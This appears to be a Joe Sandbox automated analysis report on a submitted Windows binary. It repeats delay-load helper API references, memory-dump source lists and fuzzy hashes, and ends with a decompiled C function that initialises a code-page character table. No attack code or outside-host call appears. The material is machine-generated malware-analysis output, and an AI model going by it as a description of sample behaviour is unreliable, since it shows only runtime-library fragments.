                • Opcode Fuzzy Hash: f460464b3a2da5bac48712a87f07d225ff5243cdf55647d96c48094eb0c76639
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 56720a2b97c6e59e23f6e60a2bad6bcee1418d69c377f4687a1642cb266dcce5
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 56720a2b97c6e59e23f6e60a2bad6bcee1418d69c377f4687a1642cb266dcce5
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 984827f740e7b9bcafb7ca43ff2949a15e6b6e5e263d0c9c2754e1e6f9651c58
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 984827f740e7b9bcafb7ca43ff2949a15e6b6e5e263d0c9c2754e1e6f9651c58
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 70dda076b77cb7d06d6cff03aaef4e0bb9507ba2bed842c66eb20aa482bb7076
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 70dda076b77cb7d06d6cff03aaef4e0bb9507ba2bed842c66eb20aa482bb7076
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b4e410caa687835f622c6bb240aabd2ff6f49f21402da7ceb5a59881868fd640
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: b4e410caa687835f622c6bb240aabd2ff6f49f21402da7ceb5a59881868fd640
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b57d60a81f085bb6a258068e5443f30103a202f356cce4dab33d6da7c40070b1
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: b57d60a81f085bb6a258068e5443f30103a202f356cce4dab33d6da7c40070b1
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 384e2f2caf4d03f5bf3b3cfbd8f30894f963e9d4a9cbaee5a4c87b77f4d1f56f
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 384e2f2caf4d03f5bf3b3cfbd8f30894f963e9d4a9cbaee5a4c87b77f4d1f56f
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 02733e243d0cc508a6c7534d6677465be4a22401ae0125c561edd8fa4c54661e
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 02733e243d0cc508a6c7534d6677465be4a22401ae0125c561edd8fa4c54661e
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 3d5e6305c4d61018462a36fa286e218911b3dda94a81745e5080af67e1fac1cf
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: 3d5e6305c4d61018462a36fa286e218911b3dda94a81745e5080af67e1fac1cf
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: f3af972561aa4a7fd253cd97ae730e20b155220b6ef1a3e8a9f1ae59e8d4da26
                • Instruction ID: d9847d1f95917533b2f4aca3f6dc74aa552dbf1be62ac4ce9bd973823ddef11c
                • Opcode Fuzzy Hash: f3af972561aa4a7fd253cd97ae730e20b155220b6ef1a3e8a9f1ae59e8d4da26
                • Instruction Fuzzy Hash: 97A002D51591A1FC750952535D56D37011DC4C5F51330473EF816D44C1695468451475
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 8779a0e4379a6a5908eebbdf0c18e186371f5d71d5653b7463808b319834ed1e
                • Instruction ID: 101e0d79b49d6a19239276ad6175c58418d8948380e582031853b645f2fe1d28
                • Opcode Fuzzy Hash: 8779a0e4379a6a5908eebbdf0c18e186371f5d71d5653b7463808b319834ed1e
                • Instruction Fuzzy Hash: 2BA011CA2A88A2BCB00A22222C02C3B020CC0C2F203308B2EF822888C0A8800C080830
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: c1c6da307144c1c87146de519fdbe27e4d7e43b56a4c325b9392130dbeeebf58
                • Instruction ID: 101e0d79b49d6a19239276ad6175c58418d8948380e582031853b645f2fe1d28
                • Opcode Fuzzy Hash: c1c6da307144c1c87146de519fdbe27e4d7e43b56a4c325b9392130dbeeebf58
                • Instruction Fuzzy Hash: 2BA011CA2A88A2BCB00A22222C02C3B020CC0C2F203308B2EF822888C0A8800C080830
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 22b4bd241f089d8b289b4f8d78c2a4ffee7919a2f5b5c881b2afdcbedcba53b0
                • Instruction ID: 101e0d79b49d6a19239276ad6175c58418d8948380e582031853b645f2fe1d28
                • Opcode Fuzzy Hash: 22b4bd241f089d8b289b4f8d78c2a4ffee7919a2f5b5c881b2afdcbedcba53b0
                • Instruction Fuzzy Hash: 2BA011CA2A88A2BCB00A22222C02C3B020CC0C2F203308B2EF822888C0A8800C080830
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 2>
                • API String ID: 1269201914-3453434342
                • Opcode ID: 984f2c0682c1b3d40f03a2498c6c85e1a1694aac9d4cfb4b995ecf429b67d498
                • Instruction ID: 101e0d79b49d6a19239276ad6175c58418d8948380e582031853b645f2fe1d28
                • Opcode Fuzzy Hash: 984f2c0682c1b3d40f03a2498c6c85e1a1694aac9d4cfb4b995ecf429b67d498
                • Instruction Fuzzy Hash: 2BA011CA2A88A2BCB00A22222C02C3B020CC0C2F203308B2EF822888C0A8800C080830
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E003FBBF0(void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				char _v22;
                				struct _cpinfo _v28;
                				signed int _v32;
                				signed int _v36;
                				void* __ebx;
                				void* __esi;
                				signed int _t48;
                				int _t51;
                				signed int _t54;
                				signed int _t55;
                				short _t58;
                				signed int _t60;
                				signed char _t62;
                				signed int _t63;
                				signed char* _t71;
                				signed char* _t72;
                				int _t75;
                				signed int _t78;
                				signed char* _t79;
                				short* _t80;
                				int _t84;
                				signed char _t85;
                				signed int _t86;
                				signed int _t89;
                				signed int _t90;
                				int _t92;
                				int _t93;
                				intOrPtr _t95;
                				signed int _t96;
                
                				_t91 = __edi;
                				_t48 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t48 ^ _t96;
                				_t95 = _a8;
                				_t75 = E003FB7BB(__eflags, _a4);
                				if(_t75 != 0) {
                					_push(__edi);
                					_t92 = 0;
                					__eflags = 0;
                					_t78 = 0;
                					_t51 = 0;
                					_v32 = 0;
                					while(1) {
                						__eflags =  *((intOrPtr*)(_t51 + 0x40e978)) - _t75;
                						if( *((intOrPtr*)(_t51 + 0x40e978)) == _t75) {
                							break;
                						}
                						_t78 = _t78 + 1;
                						_t51 = _t51 + 0x30;
                						_v32 = _t78;
                						__eflags = _t51 - 0xf0;
                						if(_t51 < 0xf0) {
                							continue;
                						} else {
                							__eflags = _t75 - 0xfde8;
                							if(_t75 == 0xfde8) {
                								L23:
                								_t60 = _t51 | 0xffffffff;
                							} else {
                								__eflags = _t75 - 0xfde9;
                								if(_t75 == 0xfde9) {
                									goto L23;
                								} else {
                									_t51 = IsValidCodePage(_t75 & 0x0000ffff);
                									__eflags = _t51;
                									if(_t51 == 0) {
                										goto L23;
                									} else {
                										_t51 = GetCPInfo(_t75,  &_v28);
                										__eflags = _t51;
                										if(_t51 == 0) {
                											__eflags =  *0x4326c4 - _t92; // 0x0
                											if(__eflags == 0) {
                												goto L23;
                											} else {
                												E003FB82E(_t95);
                												goto L37;
                											}
                										} else {
                											E003EFFF0(_t92, _t95 + 0x18, _t92, 0x101);
                											 *(_t95 + 4) = _t75;
                											 *(_t95 + 0x21c) = _t92;
                											_t75 = 1;
                											__eflags = _v28 - 1;
                											if(_v28 <= 1) {
                												 *(_t95 + 8) = _t92;
                											} else {
                												__eflags = _v22;
                												_t71 =  &_v22;
                												if(_v22 != 0) {
                													while(1) {
                														_t85 = _t71[1];
                														__eflags = _t85;
                														if(_t85 == 0) {
                															goto L16;
                														}
                														_t89 = _t85 & 0x000000ff;
                														_t86 =  *_t71 & 0x000000ff;
                														while(1) {
                															__eflags = _t86 - _t89;
                															if(_t86 > _t89) {
                																break;
                															}
                															 *(_t95 + _t86 + 0x19) =  *(_t95 + _t86 + 0x19) | 0x00000004;
                															_t86 = _t86 + 1;
                															__eflags = _t86;
                														}
                														_t71 =  &(_t71[2]);
                														__eflags =  *_t71;
                														if( *_t71 != 0) {
                															continue;
                														}
                														goto L16;
                													}
                												}
                												L16:
                												_t72 = _t95 + 0x1a;
                												_t84 = 0xfe;
                												do {
                													 *_t72 =  *_t72 | 0x00000008;
                													_t72 =  &(_t72[1]);
                													_t84 = _t84 - 1;
                													__eflags = _t84;
                												} while (_t84 != 0);
                												 *(_t95 + 0x21c) = E003FB77D( *(_t95 + 4));
                												 *(_t95 + 8) = _t75;
                											}
                											asm("stosd");
                											asm("stosd");
                											asm("stosd");
                											L36:
                											E003FB893(_t89, _t95); // executed
                											L37:
                											_t60 = 0;
                											__eflags = 0;
                										}
                									}
                								}
                							}
                						}
                						_pop(_t91);
                						goto L39;
                					}
                					E003EFFF0(_t92, _t95 + 0x18, _t92, 0x101);
                					_t54 = _v32 * 0x30;
                					__eflags = _t54;
                					_v36 = _t54;
                					_t55 = _t54 + 0x40e988;
                					_v32 = _t55;
                					do {
                						__eflags =  *_t55;
                						_t79 = _t55;
                						if( *_t55 != 0) {
                							while(1) {
                								_t62 = _t79[1];
                								__eflags = _t62;
                								if(_t62 == 0) {
                									break;
                								}
                								_t90 =  *_t79 & 0x000000ff;
                								_t63 = _t62 & 0x000000ff;
                								while(1) {
                									__eflags = _t90 - _t63;
                									if(_t90 > _t63) {
                										break;
                									}
                									__eflags = _t90 - 0x100;
                									if(_t90 < 0x100) {
                										_t31 = _t92 + 0x40e970; // 0x8040201
                										 *(_t95 + _t90 + 0x19) =  *(_t95 + _t90 + 0x19) |  *_t31;
                										_t90 = _t90 + 1;
                										__eflags = _t90;
                										_t63 = _t79[1] & 0x000000ff;
                										continue;
                									}
                									break;
                								}
                								_t79 =  &(_t79[2]);
                								__eflags =  *_t79;
                								if( *_t79 != 0) {
                									continue;
                								}
                								break;
                							}
                							_t55 = _v32;
                						}
                						_t92 = _t92 + 1;
                						_t55 = _t55 + 8;
                						_v32 = _t55;
                						__eflags = _t92 - 4;
                					} while (_t92 < 4);
                					 *(_t95 + 4) = _t75;
                					 *(_t95 + 8) = 1;
                					 *(_t95 + 0x21c) = E003FB77D(_t75);
                					_t80 = _t95 + 0xc;
                					_t89 = _v36 + 0x40e97c;
                					_t93 = 6;
                					do {
                						_t58 =  *_t89;
                						_t89 = _t89 + 2;
                						 *_t80 = _t58;
                						_t80 = _t80 + 2;
                						_t93 = _t93 - 1;
                						__eflags = _t93;
                					} while (_t93 != 0);
                					goto L36;
                				} else {
                					E003FB82E(_t95);
                					_t60 = 0;
                				}
                				L39:
                				return E003EFBBC(_t60, _t75, _v8 ^ _t96, _t89, _t91, _t95);
                			}


                APIs
                  • Part of subcall function 003FB7BB: GetOEMCP.KERNEL32(00000000,?,?,003FBA44,?), ref: 003FB7E6
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,003FBA89,?,00000000), ref: 003FBC64
                • GetCPInfo.KERNEL32(00000000,003FBA89,?,?,?,003FBA89,?,00000000), ref: 003FBC77
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
